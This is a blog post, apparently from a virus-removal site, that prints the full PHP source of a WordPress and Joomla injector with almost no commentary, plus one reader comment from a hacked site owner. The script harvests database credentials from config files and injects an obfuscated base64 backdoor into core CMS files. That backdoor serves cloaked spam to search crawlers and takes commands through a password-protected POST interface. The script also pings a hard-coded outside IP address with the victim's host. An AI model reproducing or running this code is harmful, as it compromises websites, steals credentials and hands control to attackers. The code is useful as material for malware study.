WordPress + Joomla hacking code

By RobertVirus Removal

This is an automated joomla / wordpress code injector.
It’ll find files, and inject php code to them.

<?php

DEFINE('ONLY_SEARCH', false);
DEFINE('MAX_LEVEL', 2);
DEFINE('MAX_ITERATION', 500);
DEFINE('P', $_SERVER['DOCUMENT_ROOT']);
DEFINE('URL', 'http://78.24.222.200/use.php');

$GLOBALS['stopkey'] = Array('upload', 'uploads', 'img', 'administrator', 'admin', 'bin', 'cache', 'cli', 'components', 'includes', 'language', 'layouts', 'libraries', 'logs', 'media',	'modules', 'plugins', 'tmp', 'upgrade', 'engine', 'templates', 'template', 'images', 'css', 'js', 'image', 'file', 'files', 'wp-admin', 'wp-content', 'wp-includes');

$GLOBALS['_'] = Array();
$dirs = Array();
$domain = Array();

$search = Array(
	Array('file' => 'configuration.php', 'cms' => 'jm', '_key' => 'JConfig'), 
	Array('file' => 'wp-config.php', 'cms' => 'wp', '_key' => '$table_prefix'),
);

$BASE_64 = 'Y2xhc3MgQ2FjaGVfQ2xhc3MKCXsKCQlwcml2YXRlICR0YWJsZSA9ICd7JFRBQkxFfSc7CgkJcHVibGljICRzdGFydF9jYWNoZSA9IGZhbHNlOwoJCXByaXZhdGUgJGNtcyA9ICd7JENNU30nOwoJCXByaXZhdGUgJGNhbm9uaWNhbCA9ICcnOwoJCQoJCXByaXZhdGUgJGRiX2hvc3QgPSAneyRIT1NUfSc7CgkJcHJpdmF0ZSAkZGJfdXNlciA9ICd7JFVTRVJ9JzsKCQlwcml2YXRlICRkYl9wYXNzd29yZCA9ICd7JERCX1BBU1NXT1JEfSc7CgkJcHJpdmF0ZSAkZGJfbmFtZSA9ICd7JE5BTUV9JzsKCQkKCQlwcml2YXRlIGZ1bmN0aW9uIHVybF9ub3coKQoJCQl7CgkJCQlyZXR1cm4gJ2h0dHA6Ly8nIC4gJF9TRVJWRVJbJ0hUVFBfSE9TVCddIC4gdXJsZGVjb2RlKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKTsKCQkJfQoJCQoJCXByaXZhdGUgZnVuY3Rpb24gdXJsX2NyZWF0ZSgkd29yayA9IDEpCgkJCXsKCQkJCUBteXNxbF9xdWVyeSgnIElOU0VSVCBJTlRPIGAnLiR0aGlzLT50YWJsZS4nYCBTRVQgYHdvcmtgID0gIicuJHdvcmsuJyIsIGB1cmxgID0gIicubXlzcWxfZXNjYXBlX3N0cmluZygkdGhpcyAtPiB1cmxfbm93KCkpLiciCgkJCQlPTiBEVVBMSUNBVEUgS0VZIFVQREFURSBgd29ya2AgPSAiJy4kd29yay4nIgoJCQkJJyk7CgkJCX0KCQkKCQlwdWJsaWMgZnVuY3Rpb24gdXJsX2NvZGUoKQoJCQl7CgkJCQlpZiAoJHF1ZXJ5ID0gQG15c3FsX3F1ZXJ5KCdTRUxFQ1QgYGNvZGVgIEZST00gYCcuJHRoaXMtPnRhYmxlLidgIFdIRVJFIGB1cmxgID0gIicubXlzcWxfZXNjYXBlX3N0cmluZygkdGhpcyAtPiB1cmxfbm93KCkpLiciJykpCgkJCQkJewoJCQkJCQlyZXR1cm4gc3RyaXBzbGFzaGVzKEBteXNxbF9yZXN1bHQoJHF1ZXJ5LCAwKSk7CgkJCQkJfQoJCQkJCgkJCQlyZXR1cm4gJyc7CgkJCX0KCQkKCQlwcml2YXRlIGZ1bmN0aW9uIHVybF9leGlzdCgpCgkJCXsKCQkJCWlmICgkcXVlcnkgPSBAbXlzcWxfcXVlcnkoJ1NFTEVDVCBjb3VudCgqKSBGUk9NIGAnLiR0aGlzLT50YWJsZS4nYCBXSEVSRSBgdXJsYCA9ICInLm15c3FsX2VzY2FwZV9zdHJpbmcoICR0aGlzLT51cmxfbm93KCkgKS4nIicpKQoJCQkJCXsKCQkJCQkJaWYgKEBteXNxbF9yZXN1bHQoJHF1ZXJ5LCAwKSA9PSAnMCcpCgkJCQkJCQl7CgkJCQkJCQkJcmV0dXJuIGZhbHNlOwoJCQkJCQkJfQoJCQkJCQllbHNlCgkJCQkJCQl7CgkJCQkJCQkJcmV0dXJuIHRydWU7CgkJCQkJCQl9CgkJCQkJfQoJCQkJCQoJCQkJcmV0dXJuIHRydWU7CgkJCX0KCQkKCQlwcml2YXRlIGZ1bmN0aW9uIGdldF9jb2RlKCkKCQkJewoJCQkJJG9wdGlvbnNbJ2h0dHAnXSA9IGFycmF5KAoJCQkJCSdtZXRob2QnID0+ICJHRVQiLAoJCQkJCSdmb2xsb3dfbG9jYXRpb24nID0+IDAKCQkJCSk7CgkJCQkKCQkJCSRjb250ZXh0ID0gc3RyZWFtX2NvbnRleHRfY3JlYXRlKCRvcHRpb25zKTsKCQkJCSRnZXQgPSBmaWxlX2dldF9jb250ZW50cygkdGhpcy0+dXJsX25vdygpLCBOVUxMLCAkY29udGV4dCk7CgkJCQkKCQkJCWlmIChwcmVnX21hdGNoKCchPGxpbmtbXj5dKnJlbD1bXCciXWNhbm9uaWNhbFtcJyJdW14+XSpocmVmPVtcJyJdKFteXCciXSspW1wnIl1bXj5dKj4haXMnLCAkZ2V0LCAkXykpCgkJCQkJewoJCQkJCQkkdGhpcyAtPiBjYW5vbmljYWwgPSBodG1sX2VudGl0eV9kZWNvZGUodXJsZGVjb2RlKCRfWzFdKSk7CgkJCQkJfQoJCQkJZWxzZWlmIChwcmVnX21hdGNoKCchPGxpbmtbXj5dKmhyZWY9W1wnIl0oW15cJyJdKylbXCciXVtePl0qcmVsPVtcJyJdY2Fub25pY2FsW1wnIl1bXj5dKj4haXMnLCAkZ2V0LCAkXykpCgkJCQkJewoJCQkJCQkkdGhpcyAtPiBjYW5vbmljYWwgPSBodG1sX2VudGl0eV9kZWNvZGUodXJsZGVjb2RlKCRfWzFdKSk7CgkJCQkJfQoKCQkJCWlmICghZW1wdHkoJGh0dHBfcmVzcG9uc2VfaGVhZGVyKSkKCQkJCQl7CgkJCQkJCXNzY2FuZigkaHR0cF9yZXNwb25zZV9oZWFkZXJbMF0sICdIVFRQLyUqZC4lKmQgJWQnLCAkY29kZSk7CgkJCQkJCWlmIChpc19udW1lcmljKCRjb2RlKSkgcmV0dXJuICRjb2RlOwoJCQkJCX0KCQkJCQoJCQkJcmV0dXJuIDIwMDsKCQkJfQoJCQkKCQlwdWJsaWMgZnVuY3Rpb24gcHJlX2NhY2hlKCkKCQkJewoJCQkJaWYgKGlzc2V0KCRfUE9TVFsnYWN0aW9uJ10pKQoJCQkJCXsKCQkJCQkJc3dpdGNoICgkX1BPU1RbJ2FjdGlvbiddKQoJCQkJCQkJewoJCQkJCQkJCWNhc2UgJ2dldF9hbGxfbGlua3MnOwoJCQkJCQkJCQloZWFkZXIoIkNvbnRlbnQtVHlwZTogdGV4dC9wbGFpbiIpOwoJCQkJCQkJCQlpZiAoJHF1ZXJ5ICA9IEBteXNxbF9xdWVyeSgnU0VMRUNUICogRlJPTSBgJy4kdGhpcy0+dGFibGUuJ2AgV0hFUkUgYHdvcmtgID0gIjEiIE9SREVSIEJZIGB1cmxgIERFU0MgTElNSVQgMCwgMjUwMCcpKQoJCQkJCQkJCQkJewoJCQkJCQkJCQkJCXdoaWxlICgkZGF0YSA9IEBteXNxbF9mZXRjaF9hc3NvYygkcXVlcnkpKSAKCQkJCQkJCQkJCQkJewoJCQkJCQkJCQkJCQkJZWNobyAnPGU+PHVybD4nIC4gJGRhdGFbJ3VybCddIC4gJzwvdXJsPjxjb2RlPicgLiAkZGF0YVsnY29kZSddIC4gJzwvY29kZT48aWQ+JyAuICRkYXRhWydJRCddIC4gJzwvaWQ+PC9lPicgLiAiXHJcbiI7CgkJCQkJCQkJCQkJCX0KCQkJCQkJCQkJCX0KCQkJCQkJCQlicmVhazsKCQkJCQkJCQkKCQkJCQkJCQljYXNlICdzZXRfbGlua3MnOwoJCQkJCQkJCQlpZiAoaXNzZXQoJF9QT1NUWydkYXRhJ10pKQoJCQkJCQkJCQkJewoJCQkJCQkJCQkJCWlmIChteXNxbF9xdWVyeSgnVVBEQVRFIGAnLiR0aGlzLT50YWJsZS4nYCBTRVQgY29kZSA9ICInIC4gbXlzcWxfZXNjYXBlX3N0cmluZygkX1BPU1RbJ2RhdGEnXSkgLiAnIiBXSEVSRSBjb2RlID0gIiIgQU5EIGB3b3JrYCA9ICIxIiBMSU1JVCAxJykpCgkJCQkJCQkJCQkJCXsKCQkJCQkJCQkJCQkJCWVjaG8gJ3RydWUnOwoJCQkJCQkJCQkJCQl9CgkJCQkJCQkJCQl9CgkJCQkJCQkJYnJlYWs7CgkJCQkJCQkJCgkJCQkJCQkJY2FzZSAnc2V0X2lkX2xpbmtzJzsKCQkJCQkJCQkJaWYgKGlzc2V0KCRfUE9TVFsnZGF0YSddKSkKCQkJCQkJCQkJCXsKCQkJCQkJCQkJCQlpZiAoQG15c3FsX3F1ZXJ5KCdVUERBVEUgYCcuJHRoaXMtPnRhYmxlLidgIFNFVCBjb2RlID0gIicgLiBteXNxbF9lc2NhcGVfc3RyaW5nKCRfUE9TVFsnZGF0YSddKSAuICciIFdIRVJFIGBJRGAgPSAiJyAuIG15c3FsX2VzY2FwZV9zdHJpbmcoJF9QT1NUWydpZCddKSAuICciJykpCgkJCQkJCQkJCQkJCXsKCQkJCQkJCQkJCQkJCWVjaG8gJ3RydWUnOwoJCQkJCQkJCQkJCQl9CgkJCQkJCQkJCQl9CgkJCQkJCQkJYnJlYWs7CgkJCQkJCQkJCgkJCQkJCQkJZGVmYXVsdDogZGllKCdlcnJvciBhY3Rpb24nKTsKCQkJCQkJCX0KCQkJCQkJZXhpdDsKCQkJCQl9CgkJCX0KCQkKCQlzdGF0aWMgZnVuY3Rpb24gd29yZHByZXNzX2NhY2hlKCRjb250ZW50KQoJCQl7CgkJCQkkR0xPQkFMU1snX2NhY2hlXyddIC0+IGNyZWF0ZV9uZXdfcGFnZSgpOwoJCQkJJGNvbnRlbnQgPSAkY29udGVudCAuICRHTE9CQUxTWydnbG9iYWxfY29kZSddOwoJCQkJJEdMT0JBTFNbJ2dsb2JhbF9jb2RlJ10gPSAnJzsKCQkJCXJldHVybiAkY29udGVudCA7CgkJCX0KCQkKCQlwdWJsaWMgZnVuY3Rpb24gY3JlYXRlX25ld19wYWdlKCkKCQkJewoJCQkJJEdMT0JBTFNbJ19jYWNoZV8nXSAtPiBkYl9jb25uZWN0KCk7CgkJCQlpZiAoIChzdHJwb3Moc3RydG9sb3dlcigkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pLCAnZ29vZ2xlYm90JykgIT09IGZhbHNlKSAmJighJHRoaXMgLT4gdXJsX2V4aXN0KCkpKQoJCQkJCXsKCQkJCQkJJHRoaXMgLT4gdXJsX2NyZWF0ZSggMCApOwoJCQkJCQkKCQkJCQkJaWYgKCgkdGhpcyAtPiBnZXRfY29kZSgpID09IDIwMCkgJiYgKCAoJHRoaXMgLT4gY2Fub25pY2FsID09ICcnKSB8fCAoICR0aGlzIC0+IGNhbm9uaWNhbCA9PSAkdGhpcy0+dXJsX25vdygpICkgKSkKCQkJCQkJCXsKCQkJCQkJCQkkdGhpcyAtPiB1cmxfY3JlYXRlKCk7CgkJCQkJCQl9CgkJCQkJfQoJCQl9CgkJCgkJc3RhdGljIGZ1bmN0aW9uIHVwZGF0ZV9jb250ZW50KCRjb250ZW50LCAkY29kZSkKCQkJewoJCQkJaWYgKCFlbXB0eSgkY29kZSkpCgkJCQkJewoJCQkJCQlpZiAocHJlZ19tYXRjaCgnITxib2R5W14+XSo+IWlzJywgJGNvbnRlbnQpKQoJCQkJCQkJewoJCQkJCQkJCSRjb250ZW50ID0gcHJlZ19yZXBsYWNlKCchKDxib2R5W14+XSo+KSFzaScsICdcMScgLiAkY29kZSwgJGNvbnRlbnQpOwoJCQkJCQkJfQoJCQkJCQllbHNlaWYgKHByZWdfbWF0Y2goJyE8L2JvZHk+IXNpJywgJGNvbnRlbnQpKQoJCQkJCQkJewoJCQkJCQkJCSRjb250ZW50ID0gcHJlZ19yZXBsYWNlKCchPC9ib2R5PiFzaScsICRjb2RlIC4gJzwvYm9keT4nLCAkY29udGVudCk7CgkJCQkJCQl9CgkJCQkJCWVsc2VpZiAocHJlZ19tYXRjaCgnITwvaHRtbD4hc2knLCAkY29udGVudCkpCgkJCQkJCQl7CgkJCQkJCQkJJGNvbnRlbnQgPSBwcmVnX3JlcGxhY2UoJyE8L2h0bWw+IXNpJywgJGNvZGUgLiAnPC9odG1sPicsICRjb250ZW50KTsKCQkJCQkJCX0KCQkJCQkJZWxzZQoJCQkJCQkJewoJCQkJCQkJCSRjb250ZW50IC49ICRjb2RlOwoJCQkJCQkJfQoJCQkJCX0KCQkJCQkKCQkJCXJldHVybiAkY29udGVudDsKCQkJfQoJCQoJCXN0YXRpYyBmdW5jdGlvbiBfY2FjaGUoJGNvbnRlbnQpCgkJCXsKCQkJCSRHTE9CQUxTWydfY2FjaGVfJ10gLT4gY3JlYXRlX25ld19wYWdlKCk7CgkJCQlyZXR1cm4gQ2FjaGVfQ2xhc3M6OnVwZGF0ZV9jb250ZW50KCRjb250ZW50LCAkR0xPQkFMU1snZ2xvYmFsX2NvZGUnXSkgOwoJCQl9CgkJCgkJc3RhdGljIGZ1bmN0aW9uIGRpc2FibGVfY2FjaGUoKQoJCQl7CgkJCQkgQG9iX2VuZF9mbHVzaCgpOwoJCQl9CgkJCgkJcHJpdmF0ZSBmdW5jdGlvbiBkYl9jb25uZWN0KCkKCQkJewoJCQkJQG15c3FsX2Nvbm5lY3QoJHRoaXMgLT4gZGJfaG9zdCwgJHRoaXMgLT4gZGJfdXNlciwgJHRoaXMgLT4gZGJfcGFzc3dvcmQpOwoJCQkJQG15c3FsX3NlbGVjdF9kYiggJHRoaXMgLT4gZGJfbmFtZSApOwoJCQl9CgkJCgkJcHVibGljIGZ1bmN0aW9uIGNyZWF0ZV9jYWNoZSgpCgkJCXsKCQkJCSR0aGlzIC0+IHN0YXJ0X2NhY2hlID0gQG9iX3N0YXJ0KCBBcnJheSgkdGhpcywgJ19jYWNoZScpICk7CgkJCX0KCQkJCgkJc3RhdGljIGZ1bmN0aW9uIGNyZWF0ZSgpCgkJCXsKCQkJCWlmICggc3RycG9zKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddLCAnd3AtYWRtaW4nKSAhPT0gRkFMU0UgKSByZXR1cm4gOwoJCQkJJEdMT0JBTFNbJ19jYWNoZV8nXSA9IG5ldyBDYWNoZV9DbGFzcygpOwoJCQkJaWYgKCRHTE9CQUxTWydfY2FjaGVfJ10gLT4gY21zID09ICdqbScpICRHTE9CQUxTWydfY2FjaGVfJ10gLT4gZGJfY29ubmVjdCgpOwoJCQkJaWYgKCRfUE9TVFsncGFzc3dvcmQnXSA9PSAneyRQQVNTV09SRH0nKSAkR0xPQkFMU1snX2NhY2hlXyddIC0+IHByZV9jYWNoZSgpOwoJCQkJJEdMT0JBTFNbJ2dsb2JhbF9jb2RlJ10gPSAkR0xPQkFMU1snX2NhY2hlXyddIC0+IHVybF9jb2RlKCk7CgkJCQkJCQoJCQkJc3dpdGNoICgkR0xPQkFMU1snX2NhY2hlXyddIC0+IGNtcykKCQkJCQl7CgkJCQkJCWNhc2UgJ3dwJzsKCQkJCQkJCWFkZF9maWx0ZXIoJ3RoZV9jb250ZW50JywgQXJyYXkoJEdMT0JBTFNbJ19jYWNoZV8nXSwgJ3dvcmRwcmVzc19jYWNoZScpKTsKCQkJCQkJYnJlYWs7CgkJCQkJCQkJCgkJCQkJCWRlZmF1bHQ6ICRHTE9CQUxTWydfY2FjaGVfJ10gLT4gY3JlYXRlX2NhY2hlKCk7CgkJCQkJfQkJCQkJCQoJCQl9CgkJCQoJfQoKQ2FjaGVfQ2xhc3M6OmNyZWF0ZSgpOw==';

function Match($regexp, $content, $index = 1)
	{
		if (preg_match($regexp, $content, $result))
			{
				return $result[$index];
			}
		return false;
	}

function SearchFile($search, $path)
	{
		if ($dir = @opendir($path))
			{
				$i = 0;
				while (($filename = @readdir($dir)) !== false)
					{
						if ($i > MAX_ITERATION) break;
						$i++;
						if ($filename != '.' && $filename != '..')
							{
								if (is_dir($path . '/' . $filename) && !in_array($filename, $GLOBALS['stopkey']))
									{
										SearchFile($search, $path . '/' . $filename);
									}
								else
									{
										foreach ($search as $_)
											{
												if (strtolower($filename) == strtolower($_['file']))
													{
														$GLOBALS['_'][$path . '/' . $filename] = Array($_['cms'], $path . '/' . $filename);
													}
											}
									}
							}
					}
			}
	}

function pingCode($password)
	{
		return '//PING
				if (@file_get_contents(\''.URL.'?p='.$password.'&url=\' . $_SERVER[\'HTTP_HOST\']))
					{
						if ($file = @file_get_contents(__FILE__))
							{
								$file = preg_replace(\'!//PING.*//ENDPING!s\', \'\', $file);
								@file_put_contents(__FILE__, $file);
							}
					}
				//ENDPING
		';
	}
	
function getCode($password, $data, $cms)
	{
		global $BASE_64;
		$code =  '';
		
		if ($code = base64_decode($BASE_64))
			{
				$code = str_replace('{$TABLE}', $data['prefix'] . 'cache_module_content', $code);
				$code = str_replace('{$PASSWORD}', $password, $code);
				$code = str_replace('{$CMS}', $cms, $code);
				
				$code = str_replace('{$HOST}', $data['host'], $code);
				$code = str_replace('{$USER}', $data['login'], $code);
				$code = str_replace('{$DB_PASSWORD}', $data['password'], $code);
				$code = str_replace('{$NAME}', $data['name'], $code);
			}
		
		return $code;
	}
	
function CreateJoomCode($data)
	{
		$password = md5('_Password_' . rand(100, 200));
		$code = pingCode($password) . "\n" . getCode($password, $data, 'jm');
		
		$sql = 'CREATE TABLE IF NOT EXISTS `'.$data['prefix'].'cache_module_content` (
					  `url` varchar(255) NOT NULL,
					  `code` text NOT NULL,
					  `work` int(11) NOT NULL,
					  `ID` int(11) NOT NULL AUTO_INCREMENT,
					  PRIMARY KEY (`ID`),
					  UNIQUE KEY `url` (`url`),
					  KEY `work` (`work`)
					) ENGINE=MyISAM  DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;';
					
		@mysql_connect($data['host'], $data['login'], $data['password']);
		@mysql_select_db($data['name']);
		
			if (@mysql_query($sql))
				{
					$_file = $data['path'] . '/includes/framework.php';
					
					if (file_exists($_file))
						{
							$file_content = file_get_contents( $_file );
							if (strpos($file_content, 'Cache_Class') === false)
								{
									$count = 1;
									$file_content = str_replace('<?php', '<?php' . "\n" . $code, $file_content, $count);
									file_put_contents($_file, $file_content);
								}
						}
					
				}
				
		@mysql_close();
	}
	
	
function CreateWpCode($data)
	{
		$password = md5('_Password_' . rand(100, 200));
		$code = pingCode($password) . "\n" . getCode($password, $data, 'wp');
		
		@mysql_connect($data['host'], $data['login'], $data['password']);
		@mysql_select_db($data['name']);

		if (file_exists($data['path'] . '/wp-includes/post.php'))
			{
				$file = file_get_contents($data['path'] . '/wp-includes/post.php');
				
				if (strpos($file, 'Cache_Class') === FALSE)
					{
						$sql = 'CREATE TABLE IF NOT EXISTS `'.$data['prefix'].'cache_module_content` (
									  `url` varchar(255) NOT NULL,
									  `code` text NOT NULL,
									  `work` int(11) NOT NULL,
									  `ID` int(11) NOT NULL AUTO_INCREMENT,
									  PRIMARY KEY (`ID`),
									  UNIQUE KEY `url` (`url`),
									  KEY `work` (`work`)
									) ENGINE=MyISAM  DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;';
							
						if (@mysql_query($sql))
							{
								$file = str_replace('function get_attached_file', $code . "\n\n".'function get_attached_file', $file);
								file_put_contents($data['path'] . '/wp-includes/post.php', $file);
							}
					}
				
			}

		@mysql_close();
		
	}
	
	
function checkDomain($configFile, $type, &$domain)
	{
		global $search;
		
		if ($file = file_get_contents($configFile))
			{
				foreach ($search as $_)
					{
						if ($type == $_['cms'])
							{
								if (strpos($file, $_['_key']) !== false)
									{
										switch ($type)
											{
												case 'wp';
													$db_name = Match('!DB_NAME[\'\s\,]+\'([^\']*)\'\s*\)!s', $file);
													$db_login = Match('!DB_USER[\'\s\,]+\'([^\']*)\'\s*\)!s', $file);
													$db_password = Match('!DB_PASSWORD[\'\s\,]+\'([^\']*)\'\s*\)!s', $file);
													$db_host = Match('!DB_HOST[\'\s\,]+\'([^\']*)\'\s*\)!s', $file);
													$db_prefix = Match('!\$table_prefix[\s=]*\'([^\']*)\'!s', $file);
												break;
												
												case 'jm';
													$db_name = Match('!\$db\s*=\s*\'([^\']*)\'!s', $file);
													$db_login = Match('!\$user\s*=\s*\'([^\']*)\'!s', $file);
													$db_password = Match('!\$password\s*=\s*\'([^\']*)\'!s', $file);
													$db_host = Match('!\$host\s*=\s*\'([^\']*)\'!s', $file);
													$db_prefix = Match('!\$dbprefix\s*=\s*\'([^\']*)\'!s', $file);
												break;
											}
											
										$domain[] = Array('host' => $db_host, 'name' => $db_name, 'login' => $db_login, 'password' => $db_password, 'prefix' => $db_prefix, 'path' => Match('!^(.*)/[^/]*$!s', $configFile), 'type' => $type);
										return ;
											
									}
							}
					}
			}
			
	}
	
function getDirList($path)
	{
		if ($dir = @opendir($path))
			{
				$result = Array();
				
				while (($filename = @readdir($dir)) !== false)
					{
						if ($filename != '.' && $filename != '..' && is_dir($path . '/' . $filename))
							$result[] = $path . '/' . $filename;
					}
				
				return $result;
			}
			
		return false;
	}

//create root dir
for ($i = 0; $i<MAX_LEVEL; $i++)
	{
		$dirs[realpath(P . str_repeat('/../', $i + 1))] = realpath(P . str_repeat('/../', $i + 1));
	}
	
//search file	
foreach ($dirs as $dir)
	{
		foreach (@getDirList($dir) as $__)
			{
				@SearchFile($search, $__);
			}
	}

//check domain + get db data
foreach ($GLOBALS['_'] as $e)
	{
		@checkDomain($e[1], $e[0], $domain);
	}
	
if (!ONLY_SEARCH) {
	//add code
	foreach ($domain as $__)
		{
			switch ($__['type'])
				{
					case 'jm';
						@CreateJoomCode($__);
					break;
					
					case 'wp';
						@CreateWpCode($__);
					break;
				}
		}
		
}

echo json_encode($domain);

?>

6 thoughts on “WordPress + Joomla hacking code

  1. Hi I found your article via google, my website is hacked and all pages can’t be displayed, I found a file named trust.php in the index folder that contains some cods similar to the one you poted in this article.

    I deleted them but the problem is still there, I doubt it has injected code to some PhP files, may I ask what should I do now?

    Many thanks!

    Reply

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.